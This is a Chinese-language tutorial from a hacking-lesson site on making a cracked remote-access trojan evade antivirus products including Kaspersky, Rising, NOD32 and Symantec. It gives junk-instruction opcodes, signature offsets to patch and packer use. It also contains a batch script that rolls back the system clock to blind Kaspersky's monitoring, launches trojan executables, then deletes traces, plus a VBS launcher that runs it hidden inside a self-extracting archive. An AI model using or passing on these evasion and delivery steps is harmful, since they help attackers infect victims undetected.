-----------------------------------------------------------------------------------

黑客动画吧 http://www.hack58.com

专业的黑客动画教程网站

免费学习黑客黑客技术

成为黑客不是梦。
打造国内最大的黑客动画网站

注意：所有教程全部对外免费开放

-----------------------------------------------------------------------------------

大家好。我是 /mg哈皮哈丘

QQ技术交流群：2786779，857924

上兴终极免杀(表面,内存,主动防御)  语音动画，请戴上耳机

免杀木马对象＝>上兴VIP2007正式版破解版木马

05.01.2007
过 卡巴，江民，瑞星，金山，NOD32，麦克菲
   Symantec赛门铁克，驱逐舰

世界杀软，只剩5个没过。。。
abcd
1.加花过 卡巴，江民，金山 表面
00499BA8 入口地址

00497DE4 加花地址

push ebx
pop ebx
push ebx
pop ebx
inc ecx
dec ecx
jb (原入口点)
jnb （原入口点）

53 5B 53 5B 41 49 0F 82 B8 1D 00 00 0F 83 B2 1D 00 00

注意：请不要和我使用一个花指令，
      我今天给大家做动画用这个花指令，
      很有可能明天这个花指令就被杀了。。
      所以请使用别的花指令。。。

2.特征码定位＝>过 瑞星,驱逐舰
瑞星文件定位
特征码 物理地址/物理长度 如下:
[特征] 0008C92D_00000002  OC转换0048D52D

0048D52B      8B55 F0       MOV EDX,DWORD PTR SS:[EBP-10]
0048D52E      8B45 FC       MOV EAX,DWORD PTR SS:[EBP-4]

第一个用-4 第二个改-10  数字互换  ＝>过 瑞星

3.过 内存
瑞星内存定位
特征码 物理地址/物理长度 如下:
[特征] 00095EB5_00000002  用c32asm改字母大小写

4.追加修改＝>过 Symantec赛门铁克
用c32asm 的16进制打开
搜索 IEXPLORE.EXE 改为小写
搜索 备注内容 可以修改成自己喜欢的名字 也可以直接用16进制填充

5.加ASProtect壳＝>过 NOD32

6.过卡巴主动防御

 a.写一个bat批处理，内容如下

::======修改系统时间使卡巴监控失效============
date 1990-01-01

date 1990-01-01

::========倒计时等待15秒======================
@echo off & setlocal enableextensions
echo Ws cript.Sleep 1000 > %temp%.\tmp$$$.vbs
set /a i = 15
:Timeout
if %i% == 0 goto Next
setlocal
set /a i = %i% - 1
cs cript //nologo %temp%.\tmp$$$.vbs
goto Timeout
goto End

::===========倒计时等待结束运行上兴=============
:Next
%systemroot%\temp\木马1.exe
%systemroot%\temp\木马2.exe
%systemroot%\temp\木马3.exe
for %%f in (%temp%.\tmp$$$.vbs*) do del %%f
::======恢复时间(卡巴监控)=======================
date 2007-04-30
::=========清除痕迹============================
RD /S /Q %systemroot%\temp\

注意：如果是让“下载者过主动防御，
      运行木马后，再添加一个倒计时，
      请把倒计时的时间设长一点，
      下载者下载木马需要点时间”

 b.写一个vbs脚本文件，内容如下

DIM objShell
set objShell=ws cript.createObject("ws cript.shell")
iReturn=objShell.Run("cmd.exe /C  %systemroot%\temp\批理名.bat", 0, TRUE)

 c.把这两个文件和木马一起用WinRAR压缩成自解压文件

终极免杀到此完成。。。。。